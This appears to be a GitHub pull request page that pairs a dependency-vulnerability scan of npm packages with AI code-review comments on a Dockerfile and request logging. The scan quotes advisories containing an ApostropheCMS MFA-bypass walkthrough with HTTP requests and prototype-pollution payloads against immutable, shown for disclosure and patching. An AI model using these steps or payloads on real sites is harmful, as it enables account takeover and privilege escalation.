pkg:npm/linkifyjs@4.2.0

high 8.8: CVE--2025--8101 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Affected range: <4.3.2
Fixed version: 4.3.2
CVSS Score: 8.8
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N
EPSS Score: 0.118%
EPSS Percentile: 30th percentile
Description

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability in Linkify (linkifyjs) allows XSS Targeting HTML Attributes and Manipulating User-Controlled Variables. This issue affects Linkify: from 4.3.1 before 4.3.2.

critical: 0 high: 1 medium: 0 low: 0 tar-fs 3.0.9 (npm)

pkg:npm/tar-fs@3.0.9

high 8.7: CVE--2025--59343 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range: >=3.0.0, <3.1.1
Fixed version: 3.1.1
CVSS Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score: 0.030%
EPSS Percentile: 8th percentile
Description

Impact

Affects v3.1.0, v2.1.3, v1.16.5 and below.

Patches

Has been patched in 3.1.1, 2.1.4, and 1.16.6

Workarounds

You can use the ignore option to ignore non files/directories.

  ignore (_, header) {
    // pass files & directories, ignore e.g. symlinks
    return header.type !== 'file' && header.type !== 'directory'
  }

Credit

Reported by: Mapta / BugBunny_ai

critical: 0 high: 1 medium: 0 low: 0 tar-fs 2.1.3 (npm)

pkg:npm/tar-fs@2.1.3

high 8.7: CVE--2025--59343 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range: >=2.0.0, <2.1.4
Fixed version: 2.1.4
CVSS Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score: 0.030%
EPSS Percentile: 8th percentile
Description

Impact

Affects v3.1.0, v2.1.3, v1.16.5 and below.

Patches

Has been patched in 3.1.1, 2.1.4, and 1.16.6

Workarounds

You can use the ignore option to ignore non files/directories.

  ignore (_, header) {
    // pass files & directories, ignore e.g. symlinks
    return header.type !== 'file' && header.type !== 'directory'
  }

Credit

Reported by: Mapta / BugBunny_ai

critical: 0 high: 1 medium: 0 low: 0 apostrophe 4.17.0 (npm)

pkg:npm/apostrophe@4.17.0

high 8.1: CVE--2026--32730 Improper Authentication

Affected range: <=4.27.1
Fixed version: 4.28.0
CVSS Score: 8.1
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Description

MFA/TOTP Bypass via Incorrect MongoDB Query in Bearer Token Middleware

Summary

The bearer token authentication middleware in @apostrophecms/express/index.js (lines 386-389) contains an incorrect MongoDB query that allows incomplete login tokens — where the password was verified but TOTP/MFA requirements were NOT — to be used as fully authenticated bearer tokens. This completely bypasses multi-factor authentication for any ApostropheCMS deployment using @apostrophecms/login-totp or any custom afterPasswordVerified login requirement.

Severity

The AC is High because the attacker must first obtain the victim's password. However, the entire purpose of MFA is to protect accounts when passwords are compromised (credential stuffing, phishing, database breaches), so this bypass negates the security control entirely.

Affected Versions

All versions of ApostropheCMS from 3.0.0 to 4.27.1, when used with @apostrophecms/login-totp or any custom afterPasswordVerified requirement.

Root Cause

In packages/apostrophe/modules/@apostrophecms/express/index.js, the getBearer() function (line 377) queries MongoDB for valid bearer tokens. The query at lines 386-389 is intended to only match tokens where the requirementsToVerify array is either absent (no MFA configured) or empty (all MFA requirements completed):

async function getBearer() {
    const bearer = await self.apos.login.bearerTokens.findOne({
        _id: req.token,
        expires: { $gte: new Date() },
        // requirementsToVerify array should be empty or inexistant
        // for the token to be usable to log in.
        $or: [
            { requirementsToVerify: { $exists: false } },
            { requirementsToVerify: { $ne: [] } }  // BUG
        ]
    });
    return bearer && bearer.userId;
}

The comment correctly states the intent: the array should be "empty or inexistant." However, the MongoDB operator $ne: [] matches documents where requirementsToVerify is NOT an empty array — meaning it matches tokens that still have unverified requirements. This is the exact opposite of the intended behavior.

Token State | requirementsToVerify | $ne: [] result | Should match?
No MFA configured | (field absent) | N/A ($exists: false matches) | Yes
TOTP pending | ["AposTotp"] | true (BUG!) | No
All verified | [] | false (BUG!) | Yes
Field removed ($unset) | (field absent) | N/A ($exists: false matches) | Yes

Attack Scenario

Prerequisites

  • ApostropheCMS instance with @apostrophecms/login-totp enabled
  • Attacker knows the victim's username and password (e.g., from credential stuffing, phishing, or a database breach)
  • Attacker does NOT know the victim's TOTP secret/code

Steps

  1. Authenticate with password only:

    POST /api/v1/@apostrophecms/login/login
    Content-Type: application/json
    
    {"username": "admin", "password": "correct_password", "session": false}
    
  2. Receive incomplete token (server correctly requires TOTP):

    {"incompleteToken": "clxxxxxxxxxxxxxxxxxxxxxxxxx"}
  3. Use incomplete token as bearer token (bypassing TOTP):

    GET /api/v1/@apostrophecms/page
    Authorization: Bearer clxxxxxxxxxxxxxxxxxxxxxxxxx
    
  4. Full authenticated access granted. The bearer token middleware matches the token because requirementsToVerify: ["AposTotp"] satisfies $ne: []. The attacker has complete API access as the victim without ever providing a TOTP code.
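The four steps above amount to two HTTP requests. As a sketch (hypothetical target host; the functions only build request descriptors, nothing is sent):

```javascript
// Sketch of the attack's request sequence against a hypothetical host.
const base = 'https://cms.example.com';

// Step 1: password-only login, requesting a token instead of a session.
function buildPasswordLogin(username, password) {
  return {
    method: 'POST',
    url: `${base}/api/v1/@apostrophecms/login/login`,
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ username, password, session: false })
  };
}

// Step 3: replay the incompleteToken as if it were a full bearer token.
function buildBearerProbe(incompleteToken) {
  return {
    method: 'GET',
    url: `${base}/api/v1/@apostrophecms/page`,
    headers: { Authorization: `Bearer ${incompleteToken}` }
  };
}
```

On a vulnerable instance, the second request succeeds even though the token still has `requirementsToVerify: ["AposTotp"]`.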

Proof of Concept

See mfa-bypass-poc.js — demonstrates the query logic bug with all token states. Run:

#!/usr/bin/env node
/**
 * PoC: MFA/TOTP Bypass via Incorrect MongoDB Query in Bearer Token Middleware
 *
 * ApostropheCMS's bearer token middleware in @apostrophecms/express/index.js
 * has a logic error in the MongoDB query that validates bearer tokens.
 *
 * The comment says:
 *   "requirementsToVerify array should be empty or inexistant
 *    for the token to be usable to log in."
 *
 * But the actual query uses `$ne: []` (NOT equal to empty array),
 * which matches tokens WITH unverified requirements — the exact opposite
 * of the intended behavior.
 *
 * This allows an attacker who knows a user's password (but NOT their
 * TOTP code) to use the "incompleteToken" returned after password
 * verification as a fully authenticated bearer token, bypassing MFA.
 *
 * Affected: ApostropheCMS with @apostrophecms/login-totp (or any
 * custom afterPasswordVerified requirement)
 *
 * File: packages/apostrophe/modules/@apostrophecms/express/index.js:386-389
 */

const RED = '\x1b[91m';
const GREEN = '\x1b[92m';
const YELLOW = '\x1b[93m';
const CYAN = '\x1b[96m';
const RESET = '\x1b[0m';
const BOLD = '\x1b[1m';

// Simulate MongoDB's $ne operator behavior
function mongoNe(fieldValue, compareValue) {
  // MongoDB $ne: true if field value is NOT equal to compareValue
  // For arrays, MongoDB compares by value
  if (Array.isArray(fieldValue) && Array.isArray(compareValue)) {
    if (fieldValue.length !== compareValue.length) return true;
    return fieldValue.some((v, i) => v !== compareValue[i]);
  }
  return fieldValue !== compareValue;
}

// Simulate MongoDB's $exists operator
function mongoExists(doc, field, shouldExist) {
  const exists = field in doc;
  return exists === shouldExist;
}

// Simulate MongoDB's $size operator
function mongoSize(fieldValue, size) {
  if (!Array.isArray(fieldValue)) return false;
  return fieldValue.length === size;
}

// Simulate the VULNERABLE bearer token query (line 386-389)
function vulnerableQuery(token) {
  // $or: [
  //   { requirementsToVerify: { $exists: false } },
  //   { requirementsToVerify: { $ne: [] } }     <-- BUG
  // ]
  const cond1 = mongoExists(token, 'requirementsToVerify', false);
  const cond2 = ('requirementsToVerify' in token)
    ? mongoNe(token.requirementsToVerify, [])
    : false;
  return cond1 || cond2;
}

// Simulate the FIXED bearer token query
function fixedQuery(token) {
  // $or: [
  //   { requirementsToVerify: { $exists: false } },
  //   { requirementsToVerify: { $size: 0 } }    <-- FIX
  // ]
  const cond1 = mongoExists(token, 'requirementsToVerify', false);
  const cond2 = ('requirementsToVerify' in token)
    ? mongoSize(token.requirementsToVerify, 0)
    : false;
  return cond1 || cond2;
}

function banner() {
  console.log(`${CYAN}${BOLD}
╔══════════════════════════════════════════════════════════════════╗
║  ApostropheCMS MFA/TOTP Bypass PoC                              ║
║  Bearer Token Middleware — Incorrect MongoDB Query ($ne vs $eq)  ║
║  @apostrophecms/express/index.js:386-389                         ║
╚══════════════════════════════════════════════════════════════════╝${RESET}
`);
}

function test(name, token, expectedVuln, expectedFixed) {
  const vulnResult = vulnerableQuery(token);
  const fixedResult = fixedQuery(token);

  const vulnCorrect = vulnResult === expectedVuln;
  const fixedCorrect = fixedResult === expectedFixed;

  console.log(`${BOLD}${name}${RESET}`);
  console.log(`  Token: ${JSON.stringify(token)}`);
  console.log(`  Vulnerable query matches: ${vulnResult ? GREEN + 'YES' : RED + 'NO'}${RESET} (${vulnCorrect ? 'expected' : RED + 'UNEXPECTED!' + RESET})`);
  console.log(`  Fixed query matches:      ${fixedResult ? GREEN + 'YES' : RED + 'NO'}${RESET} (${fixedCorrect ? 'expected' : RED + 'UNEXPECTED!' + RESET})`);

  if (vulnResult && !fixedResult) {
    console.log(`  ${RED}=> BYPASS: Token accepted by vulnerable code but rejected by fix!${RESET}`);
  }
  console.log();
  return vulnResult && !fixedResult;
}

// ——— Main ———
banner();
const bypasses = [];

console.log(`${BOLD}--- Token States During Login Flow ---${RESET}\n`);

// 1. Normal bearer token (no MFA configured)
// Created by initialLogin when there are no lateRequirements
// Token: { _id: "xxx", userId: "yyy", expires: Date }
// No requirementsToVerify field at all
test(
  '[Token 1] Normal bearer token (no MFA) — should be ACCEPTED',
  { _id: 'token1', userId: 'user1', expires: new Date(Date.now() + 86400000) },
  true,  // vulnerable: accepted (correct)
  true   // fixed: accepted (correct)
);

// 2. Incomplete token — password verified, TOTP NOT verified
// Created by initialLogin when lateRequirements exist
// Token: { _id: "xxx", userId: "yyy", requirementsToVerify: ["AposTotp"], expires: Date }
const bypass1 = test(
  '[Token 2] Incomplete token (TOTP NOT verified) — should be REJECTED',
  { _id: 'token2', userId: 'user2', requirementsToVerify: ['AposTotp'], expires: new Date(Date.now() + 3600000) },
  true,  // vulnerable: ACCEPTED (BUG! $ne:[] matches ['AposTotp'])
  false  // fixed: rejected (correct)
);
if (bypass1) bypasses.push('TOTP bypass');

// 3. Token after all requirements verified (empty array, before $unset)
// After requirementVerify pulls each requirement from the array
// Token: { _id: "xxx", userId: "yyy", requirementsToVerify: [], expires: Date }
test(
  '[Token 3] All requirements verified (empty array) — should be ACCEPTED',
  { _id: 'token3', userId: 'user3', requirementsToVerify: [], expires: new Date(Date.now() + 86400000) },
  false, // vulnerable: REJECTED (BUG! $ne:[] does NOT match [])
  true   // fixed: accepted (correct)
);

// 4. Finalized token (requirementsToVerify removed via $unset)
// After finalizeIncompleteLogin calls $unset
// Token: { _id: "xxx", userId: "yyy", expires: Date }
test(
  '[Token 4] Finalized token ($unset completed) — should be ACCEPTED',
  { _id: 'token4', userId: 'user4', expires: new Date(Date.now() + 86400000) },
  true,  // vulnerable: accepted (correct)
  true   // fixed: accepted (correct)
);

// 5. Multiple unverified requirements
const bypass2 = test(
  '[Token 5] Multiple unverified requirements — should be REJECTED',
  { _id: 'token5', userId: 'user5', requirementsToVerify: ['AposTotp', 'CustomMFA'], expires: new Date(Date.now() + 3600000) },
  true,  // vulnerable: ACCEPTED (BUG!)
  false  // fixed: rejected (correct)
);
if (bypass2) bypasses.push('Multi-requirement bypass');

// Attack scenario
console.log(`${BOLD}--- Attack Scenario ---${RESET}\n`);
console.log(`  ${YELLOW}Prerequisites:${RESET}`);
console.log(`    - ApostropheCMS instance with @apostrophecms/login-totp enabled`);
console.log(`    - Attacker knows victim's username and password`);
console.log(`    - Attacker does NOT know victim's TOTP code\n`);

console.log(`  ${YELLOW}Step 1:${RESET} Attacker sends login request with valid credentials`);
console.log(`    POST /api/v1/@apostrophecms/login/login`);
console.log(`    {"username": "admin", "password": "correct_password", "session": false}\n`);

console.log(`  ${YELLOW}Step 2:${RESET} Server verifies password, returns incomplete token`);
console.log(`    Response: {"incompleteToken": "clxxxxxxxxxxxxxxxxxxxxxxxxx"}`);
console.log(`    (TOTP verification still required)\n`);

console.log(`  ${YELLOW}Step 3:${RESET} Attacker uses incompleteToken as a Bearer token`);
console.log(`    GET /api/v1/@apostrophecms/page`);
console.log(`    Authorization: Bearer clxxxxxxxxxxxxxxxxxxxxxxxxx\n`);

console.log(`  ${YELLOW}Step 4:${RESET} Bearer token middleware runs getBearer() query`);
console.log(`    MongoDB query: {`);
console.log(`      _id: "clxxxxxxxxxxxxxxxxxxxxxxxxx",`);
console.log(`      expires: { $gte: new Date() },`);
console.log(`      $or: [`);
console.log(`        { requirementsToVerify: { $exists: false } },`);
console.log(`        { requirementsToVerify: { ${RED}$ne: []${RESET} } }  // BUG!`);
console.log(`      ]`);
console.log(`    }`);
console.log(`    The token has requirementsToVerify: ["AposTotp"]`);
console.log(`    $ne: [] matches because ["AposTotp"] !== []\n`);

console.log(`  ${RED}Step 5: Attacker is fully authenticated as the victim!${RESET}`);
console.log(`    req.user is set, req.csrfExempt = true`);
console.log(`    Full API access without TOTP verification\n`);

// Summary
console.log(`${BOLD}${'='.repeat(64)}`);
console.log(`Summary`);
console.log(`${'='.repeat(64)}${RESET}`);
console.log(`  ${bypasses.length} bypass vector(s) confirmed: ${bypasses.join(', ')}\n`);
console.log(`  ${YELLOW}Root Cause:${RESET} @apostrophecms/express/index.js line 388`);
console.log(`  The MongoDB query uses $ne: [] which matches NON-empty arrays.`);
console.log(`  The comment says the array should be "empty or inexistant",`);
console.log(`  but $ne: [] matches exactly the opposite — non-empty arrays.\n`);
console.log(`  ${YELLOW}Vulnerable code:${RESET}`);
console.log(`    $or: [`);
console.log(`      { requirementsToVerify: { $exists: false } },`);
console.log(`      { requirementsToVerify: { $ne: [] } }  // BUG`);
console.log(`    ]\n`);
console.log(`  ${YELLOW}Fixed code:${RESET}`);
console.log(`    $or: [`);
console.log(`      { requirementsToVerify: { $exists: false } },`);
console.log(`      { requirementsToVerify: { $size: 0 } }  // FIX`);
console.log(`    ]\n`);
console.log(`  ${RED}Impact:${RESET} Complete MFA bypass. An attacker who knows a user's`);
console.log(`  password can skip TOTP verification and gain full authenticated`);
console.log(`  API access by using the incompleteToken as a bearer token.\n`);
console.log(`  ${YELLOW}Additional Bug:${RESET} The same $ne:[] also causes a secondary`);
console.log(`  issue where tokens with ALL requirements verified (empty array,`);
console.log(`  before the $unset runs) are incorrectly REJECTED. This is masked`);
console.log(`  by the fact that finalizeIncompleteLogin uses $unset to remove`);
console.log(`  the field entirely, so the $exists: false path is used instead.`);
console.log();
console.log();

Both bypass vectors (single and multiple unverified requirements) confirmed.

Amplifying Bug: Incorrect Token Deletion in finalizeIncompleteLogin

A second bug in @apostrophecms/login/index.js (lines 728-729, 735-736) amplifies the MFA bypass. When finalizeIncompleteLogin attempts to delete the incomplete token, it uses the wrong identifier:

await self.bearerTokens.removeOne({
    _id: token.userId  // BUG: should be token._id
});

The token's _id is a CUID (e.g., clxxxxxxxxx), but token.userId is the user's document ID. This means:

  1. The incomplete token is never deleted from the database, even after a legitimate MFA-verified login
  2. Combined with the $ne: [] bug, the incomplete token remains usable as a bearer token for its full lifetime (default: 1 hour)
  3. Even if the legitimate user completes TOTP and logs in properly, the incomplete token persists

This bug appears at two locations in finalizeIncompleteLogin:

  • Line 728-729: Error case (user not found)
  • Line 735-736: Success case (session-based login after MFA)
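The deletion bug can be simulated with an in-memory stand-in for the bearerTokens collection (a Map keyed by `_id`; the token field names follow the report, the store itself is an assumption for illustration):

```javascript
// In-memory stand-in for the bearerTokens collection, keyed by _id.
const store = new Map();

function removeOne(query) {
  return store.delete(query._id);
}

// An incomplete token: _id is a CUID, userId is the user's document ID.
const token = {
  _id: 'clx_token_id',
  userId: 'user_doc_id',
  requirementsToVerify: ['AposTotp']
};
store.set(token._id, token);

// Buggy cleanup (as in finalizeIncompleteLogin): queries by userId,
// which matches no document, so the token silently survives.
removeOne({ _id: token.userId });
console.log(store.has('clx_token_id')); // token survives

// Fixed cleanup: use the token's actual _id.
removeOne({ _id: token._id });
console.log(store.has('clx_token_id')); // token gone
```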

Recommended Fix

Fix 1: Bearer token query (express/index.js line 388)

Replace $ne: [] with $size: 0:

$or: [
    { requirementsToVerify: { $exists: false } },
    { requirementsToVerify: { $size: 0 } }  // FIX: match empty array only
]

This ensures only tokens with no remaining requirements (empty array or absent field) are accepted as valid bearer tokens.

Fix 2: Token deletion (login/index.js lines 728-729, 735-736)

Replace token.userId with token._id:

await self.bearerTokens.removeOne({
    _id: token._id  // FIX: use the token's actual ID
});
critical: 0 high: 1 medium: 0 low: 0 jws 4.0.0 (npm)

pkg:npm/jws@4.0.0

high 7.5: CVE-2025-65945 Improper Verification of Cryptographic Signature

Affected range: =4.0.0
Fixed version: 4.0.1
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
EPSS Score: 0.010%
EPSS Percentile: 1st percentile
Description

Overview

An improper signature verification vulnerability exists when using auth0/node-jws with the HS256 algorithm under specific conditions.

Am I Affected?

You are affected by this vulnerability if you meet all of the following preconditions:

  1. Application uses the auth0/node-jws implementation of JSON Web Signatures, versions <=3.2.2 || 4.0.0
  2. Application uses the jws.createVerify() function for HMAC algorithms
  3. Application uses user-provided data from the JSON Web Signature Protected Header or Payload in the HMAC secret lookup routines

You are NOT affected by this vulnerability if you meet any of the following preconditions:

  1. Application uses the jws.verify() interface (note: auth0/node-jsonwebtoken users fall into this category and are therefore NOT affected by this vulnerability)
  2. Application uses only asymmetric algorithms (e.g. RS256)
  3. Application doesn’t use user-provided data from the JSON Web Signature Protected Header or Payload in the HMAC secret lookup routines

Fix

Upgrade auth0/node-jws version to version 3.2.3 or 4.0.1

Acknowledgement

Okta would like to thank Félix Charette for discovering this vulnerability.

critical: 0 high: 1 medium: 0 low: 0 async 1.5.2 (npm)

pkg:npm/async@1.5.2

high 7.8: CVE-2021-43138 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

Affected range: <2.6.4
Fixed version: 2.6.4, 3.2.2
CVSS Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score: 0.657%
EPSS Percentile: 71st percentile
Description

A vulnerability exists in Async through 3.2.1 (fixed in 3.2.2), which could let a malicious user obtain privileges via the mapValues() method.

critical: 0 high: 1 medium: 0 low: 0 immutable 5.1.1 (npm)

pkg:npm/immutable@5.1.1

high 8.7: CVE-2026-29063 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Affected range: >=5.0.0 <5.1.5
Fixed version: 5.1.5
CVSS Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
EPSS Score: 0.060%
EPSS Percentile: 18th percentile
Description

Impact

What kind of vulnerability is it? Who is impacted?

A Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs.

Affected APIs

API | Notes
mergeDeep(target, source) | Iterates source keys via ObjectSeq, assigns merged[key]
mergeDeepWith(merger, target, source) | Same code path
merge(target, source) | Shallow variant, same assignment logic
Map.toJS() | object[k] = v in toObject() with no __proto__ guard
Map.toObject() | Same toObject() implementation
Map.mergeDeep(source) | When source is converted to plain object

Patches

Has the problem been patched? What versions should users upgrade to?

Major version | Patched version
3.x | 3.8.3
4.x | 4.3.7
5.x | 5.1.5

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?
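The advisory leaves this question unanswered. One possible mitigation sketch (an assumption, not an official recommendation, and no substitute for upgrading) is to strip prototype-polluting keys from untrusted JSON before it reaches the merge APIs:

```javascript
// Hypothetical pre-merge sanitizer: recursively drops keys that can
// reach the prototype chain before untrusted input is handed to
// immutable's mergeDeep/merge/toJS paths.
const BAD_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function sanitize(value) {
  if (Array.isArray(value)) return value.map(sanitize);
  if (value !== null && typeof value === 'object') {
    const out = {};
    for (const key of Object.keys(value)) {
      if (!BAD_KEYS.has(key)) out[key] = sanitize(value[key]);
    }
    return out;
  }
  return value;
}
```

Note that JSON.parse creates `__proto__` as an ordinary own property, so `Object.keys` sees it and the filter above removes it.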

Proof of Concept

PoC 1 — mergeDeep privilege escalation

"use strict";
const { mergeDeep } = require("immutable"); // v5.1.4

// Simulates: app merges HTTP request body (JSON) into user profile
const userProfile = { id: 1, name: "Alice", role: "user" };
const requestBody = JSON.parse(
  '{"name":"Eve","__proto__":{"role":"admin","admin":true}}',
);

const merged = mergeDeep(userProfile, requestBody);

console.log("merged.name:", merged.name); // Eve   (updated correctly)
console.log("merged.role:", merged.role); // user  (own property wins)
console.log("merged.admin:", merged.admin); // true  ← INJECTED via __proto__!

// Common security checks — both bypassed:
const isAdminByFlag = (u) => u.admin === true;
const isAdminByRole = (u) => u.role === "admin";
console.log("isAdminByFlag:", isAdminByFlag(merged)); // true  ← BYPASSED!
console.log("isAdminByRole:", isAdminByRole(merged)); // false (own role=user wins)

// Stealthy: Object.keys() hides 'admin'
console.log("Object.keys:", Object.keys(merged)); // ['id', 'name', 'role']
// But property lookup reveals it:
console.log("merged.admin:", merged.admin); // true

PoC 2 — All affected APIs

"use strict";
const { mergeDeep, mergeDeepWith, merge, Map } = require("immutable");

const payload = JSON.parse('{"__proto__":{"admin":true,"role":"superadmin"}}');

// 1. mergeDeep
const r1 = mergeDeep({ user: "alice" }, payload);
console.log("mergeDeep admin:", r1.admin); // true

// 2. mergeDeepWith
const r2 = mergeDeepWith((a, b) => b, { user: "alice" }, payload);
console.log("mergeDeepWith admin:", r2.admin); // true

// 3. merge
const r3 = merge({ user: "alice" }, payload);
console.log("merge admin:", r3.admin); // true

// 4. Map.toJS() with __proto__ key
const m = Map({ user: "alice" }).set("__proto__", { admin: true });
const r4 = m.toJS();
console.log("toJS admin:", r4.admin); // true

// 5. Map.toObject() with __proto__ key
const m2 = Map({ user: "alice" }).set("__proto__", { admin: true });
const r5 = m2.toObject();
console.log("toObject admin:", r5.admin); // true

// 6. Nested path
const nested = JSON.parse('{"profile":{"__proto__":{"admin":true}}}');
const r6 = mergeDeep({ profile: { bio: "Hello" } }, nested);
console.log("nested admin:", r6.profile.admin); // true

// 7. Confirm NOT global
console.log("({}).admin:", {}.admin); // undefined (global safe)

Verified output against immutable@5.1.4:

mergeDeep admin: true
mergeDeepWith admin: true
merge admin: true
toJS admin: true
toObject admin: true
nested admin: true
({}).admin: undefined  ← global Object.prototype NOT polluted

References

Are there any links users can visit to find out more?

@coderabbitai coderabbitai bot left a comment

Actionable comments posted: 2

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)
Dockerfile (1)

1-37: 🧹 Nitpick | 🔵 Trivial

Add HEALTHCHECK instruction for container orchestration.

Both Trivy and Checkov flag the missing HEALTHCHECK. Without it, orchestrators (Kubernetes, Docker Swarm, ECS) cannot determine if the application inside the container is actually healthy and serving requests.

🩺 Suggested HEALTHCHECK
 # Switch to non-root user
 USER appuser

 # Set working directory
 WORKDIR /app

+# Health check for container orchestration
+HEALTHCHECK --interval=30s --timeout=10s --start-period=5s --retries=3 \
+  CMD node -e "require('http').get('http://localhost:3000/health', (r) => process.exit(r.statusCode === 200 ? 0 : 1)).on('error', () => process.exit(1))"
+
 # Expose the port the app runs on
 EXPOSE 3000

This requires a /health endpoint in your Express app. Alternatively, use wget or curl if available in the Alpine image.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@Dockerfile` around lines 1 - 37, Add a Docker HEALTHCHECK instruction to the
Dockerfile so orchestrators can probe the app; add a HEALTHCHECK that
periodically curl/wget http://localhost:3000/health (or your Express /health
route) and returns non-zero on failure, placed after EXPOSE 3000 and before CMD
["npm","start"]. Ensure your app exposes a /health handler in the Express server
(e.g., in the code that starts under npm start) that returns 200 when healthy;
if curl/wget are not present in the base image, either install a tiny probe
utility during the build stage or switch the healthcheck command to use a
shell-built-in check appropriate for node.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@Dockerfile`:
- Line 24: Typo in the Dockerfile comment: change the word "wfrom" to "from" in
the comment line that reads "Copy layer wfrom build image" so it becomes "Copy
layer from build image"; locate this in the Dockerfile comment and correct the
spelling.

In `@website/modules/`@apostrophecms/express/index.js:
- Around line 11-19: The request-logging middleware (middleware -> logRequests
-> middleware) uses morgan unconditionally; make it environment-aware by
checking NODE_ENV or an equivalent runtime config and only registering or using
the verbose morgan format in non-production (or when a config flag like
ENABLE_REQUEST_LOGGING is true). Modify the middleware factory to read
process.env.NODE_ENV (or the module's options) and conditionally return the
logRequests entry (or swap to a compact/obfuscated format) so production avoids
the current verbose morgan(':date[iso] :method :url :status :response-time ms -
:remote-addr - :user-agent') while dev/test keep it.

---

Outside diff comments:
In `@Dockerfile`:
- Around line 1-37: Add a Docker HEALTHCHECK instruction to the Dockerfile so
orchestrators can probe the app; add a HEALTHCHECK that periodically curl/wget
http://localhost:3000/health (or your Express /health route) and returns
non-zero on failure, placed after EXPOSE 3000 and before CMD ["npm","start"].
Ensure your app exposes a /health handler in the Express server (e.g., in the
code that starts under npm start) that returns 200 when healthy; if curl/wget
are not present in the base image, either install a tiny probe utility during
the build stage or switch the healthcheck command to use a shell-built-in check
appropriate for node.

ℹ️ Review info
⚙️ Run configuration

Configuration used: Organization UI

Review profile: ASSERTIVE

Plan: Pro

Run ID: 19897063-72dc-4ae7-9a88-73ee937b44c9

📥 Commits

Reviewing files that changed from the base of the PR and between 4389063 and 40c32c7.

⛔ Files ignored due to path filters (1)
  • website/package-lock.json is excluded by !**/package-lock.json
📒 Files selected for processing (3)
  • Dockerfile
  • website/modules/@apostrophecms/express/index.js
  • website/package.json

# Create a non-root user and group
RUN addgroup -S appgroup && adduser -S -G appgroup appuser

# Copy layer wfrom build image

⚠️ Potential issue | 🟡 Minor

Typo in comment.

wfrom → from

-# Copy layer wfrom build image
+# Copy layer from build image
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
# Copy layer wfrom build image
# Copy layer from build image
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@Dockerfile` at line 24, Typo in the Dockerfile comment: change the word
"wfrom" to "from" in the comment line that reads "Copy layer wfrom build image"
so it becomes "Copy layer from build image"; locate this in the Dockerfile
comment and correct the spelling.

Comment on lines +11 to +19
  middleware(_self) {
    return {
      logRequests: {
        middleware: morgan(
          ':date[iso] :method :url :status :response-time ms - :remote-addr - :user-agent',
        ),
      },
    };
  },

🧹 Nitpick | 🔵 Trivial

Consider making request logging environment-aware.

The morgan middleware is unconditionally enabled for all environments. In production, verbose request logging can:

  • Generate significant log volume
  • Potentially impact performance on high-traffic endpoints
  • Log sensitive URL parameters

Consider gating logging or adjusting the format based on environment:

♻️ Suggested approach
+const { getEnv } = require('../../../utils/env');
+
 module.exports = {
   options: {
     session: {
       secret: getEnv('SESSION_SECRET'),
     },
   },
   middleware(_self) {
+    const nodeEnv = getEnv('NODE_ENV') || 'development';
+    const format = nodeEnv === 'production'
+      ? 'combined'
+      : ':date[iso] :method :url :status :response-time ms - :remote-addr - :user-agent';
     return {
       logRequests: {
-        middleware: morgan(
-          ':date[iso] :method :url :status :response-time ms - :remote-addr - :user-agent',
-        ),
+        middleware: morgan(format),
       },
     };
   },
 };
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@website/modules/`@apostrophecms/express/index.js around lines 11 - 19, The
request-logging middleware (middleware -> logRequests -> middleware) uses morgan
unconditionally; make it environment-aware by checking NODE_ENV or an equivalent
runtime config and only registering or using the verbose morgan format in
non-production (or when a config flag like ENABLE_REQUEST_LOGGING is true).
Modify the middleware factory to read process.env.NODE_ENV (or the module's
options) and conditionally return the logRequests entry (or swap to a
compact/obfuscated format) so production avoids the current verbose
morgan(':date[iso] :method :url :status :response-time ms - :remote-addr -
:user-agent') while dev/test keep it.

@a-nomad a-nomad merged commit 8b02654 into main Mar 19, 2026
11 checks passed
@a-nomad a-nomad deleted the devops/change-image branch March 19, 2026 14:23